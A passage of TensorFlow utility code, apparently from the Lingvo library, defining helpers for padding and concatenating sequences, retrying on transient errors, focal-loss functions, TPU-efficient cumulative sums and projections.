pad = tf.scatter_nd([[axis, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[axis] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x)
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must have a shape broadcastable to 'x' if specified.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, tf.zeros([], padding.dtype)),
tf.equal(padding, tf.ones([], padding.dtype)))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros([], x.dtype)
if padding.dtype != tf.bool:
padding = padding > tf.zeros([], padding.dtype)
result = tf.where_v2(padding, padded, x)
return tf.ensure_shape(result, x.shape)
else:
result = x * tf.cast(1.0 - tf.cast(padding, tf.float32), x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value gives us num_padded + 1
# and so counting the number that differs gives us num_padded - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
def PaddingsFromLengths(lengths, maxlen=None):
"""Computes paddings Tensor from lengths.
Note the following isn't guaranteed due to leading paddings.
PaddingsFromLengths(LengthsFromPaddings(x)) == x.
This method does not generate leading paddings.
Args:
lengths: A int32 Tensor of shape [B].
maxlen: None or a Python int or a scalar Tensor.
Returns:
A 0/1 valued Tensor of shape [B, maxlen or ?] where 1s are padded positions.
"""
lengths = HasRank(lengths, 1)
if maxlen is not None:
lengths = with_dependencies(
[assert_less_equal(tf.cast(tf.reduce_max(lengths), tf.int32), maxlen)],
lengths)
return 1. - tf.sequence_mask(lengths, maxlen=maxlen, dtype=tf.float32)
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lengths as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# inpu0 and input1 should have the same batch size and same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def ShiftLeft(tensor, shift_size, pad_val=0, axis=1):
"""Shifts the values in a tensor to the left along the axis dimension.
The first shift_size values are dropped, and the tensor is padded on the
right with pad_val.
Args:
tensor: the input tensor with the axis dim being time.
shift_size: the number of frames >= 0 to shift.
pad_val: the value to pad on the right of the tensor.
axis: The dimension along which the tensor will be shifted, default to 1.
Returns:
A left shifted tensor on dimension axis.
"""
rank = tensor.shape.rank
with tf.control_dependencies(
[assert_greater_equal(rank, 2),
assert_greater_equal(shift_size, 0)]):
time = GetShape(tensor)[axis]
begin = tf.scatter_nd([[axis]], [shift_size], [rank])
return PadSequenceDimension(
tf.slice(tensor, begin, size=[-1] * rank), time, pad_val, axis=axis)
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents of
each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
paddings = tf.stack([pad, zeros], axis=1)
# If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3]. [4, 4, 5, 5, 6, 6]]
# As a comparison tf.tile(x, multiples=[1, 2]) gives:\
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probabilistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = MaybeGenerateSeedFromScope()
def Backward(fwd_xs, fwd_ys, d_fwd_ys):
"""The backward function that rematerializes forward outputs."""
del fwd_ys
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
MaybeResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return NestedMap(
initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
def Forward(fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs.xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(fwd_xs.initial_step_seed)
ys = fn(*fwd_xs.xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = CallDefun(
Forward,
NestedMap(initial_step_seed=initial_step_seed, xs=xs),
bak=Backward)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
MaybeResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = frozenset({
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
Stateful random number generator ops should be avoid in Recurrent() call.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction or ConcreteFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None, 'Defun {} is not in the graph .'.format(
func.definition.signature.name))
nodes = py_collections.deque(func.definition.node_def)
else:
nodes = py_collections.deque(func.function_def.node_def)
stateful_ops = []
# Recursively search for stateful random op.
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.name)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
elif node.op == 'StatefulPartitionedCall':
_AddDefunNodes(node.attr['f'].func.name)
elif node.op != 'PartitionedCall':
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
def _ToPlacerholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
return nmap.Transform(_ToPlacerholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
"""Softmax with extra_logits, might be useful for large xformer LM."""
if extra_logit is None:
return tf.nn.softmax(logits, axis=axis, name=name)
axis = -1 if axis is None else axis
def ReduceLogSumExp(x):
max_logit = tf.math.reduce_max(
tf.stop_gradient(x), axis=axis, keepdims=True)
base_logit = tf.math.maximum(max_logit, extra_logit)
x -= base_logit
exp_x = tf.math.exp(x)
sum_exp_x = tf.math.reduce_sum(exp_x, axis=axis, keepdims=True)
sum_exp_x += tf.math.exp(extra_logit - base_logit)
return tf.math.log(sum_exp_x) + base_logit
def LogSoftmax(x):
return x - ReduceLogSumExp(x)
with tf.name_scope(name):
return tf.math.exp(LogSoftmax(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None,
stop_gradient_on_focal_loss_coefficient=False):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
focal loss coefficient (1-p)^gamma to stabilize the gradient.
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
def _ApplyFocalLossCoefficient(loss, log_probs):
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
coefficient = tf.pow(1.0 - probs, gamma)
if stop_gradient_on_focal_loss_coefficient:
coefficient = tf.stop_gradient(coefficient)
loss *= coefficient
return loss
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
loss = _ApplyFocalLossCoefficient(loss, log_probs)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
loss = _ApplyFocalLossCoefficient(loss, -loss)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z_]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
"""A TPU efficient implementation of tf.cumsum().
This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
the axis dimension is very large. The current Tensorflow implementation is
based on scanning and reducing which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
use_einsum: If true, use einsum on TPU.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
if use_einsum:
assert isinstance(rank, int) and rank < 26, rank
# Use einsum to avoid data formatting overhead.
a2z = ''.join([chr(i) for i in range(97, 123)]) # abc...xyz
src = a2z[:rank]
if axis == -1:
tgt = src[:-1] + 'z'
else:
tgt = src[:axis] + 'z' + src[axis + 1:]
length = GetShape(x)[axis]
causal_mask = tf.linalg.band_part(
tf.ones([length, length], dtype=x.dtype), 0, -1)
return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
# This is equivalent to:
# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
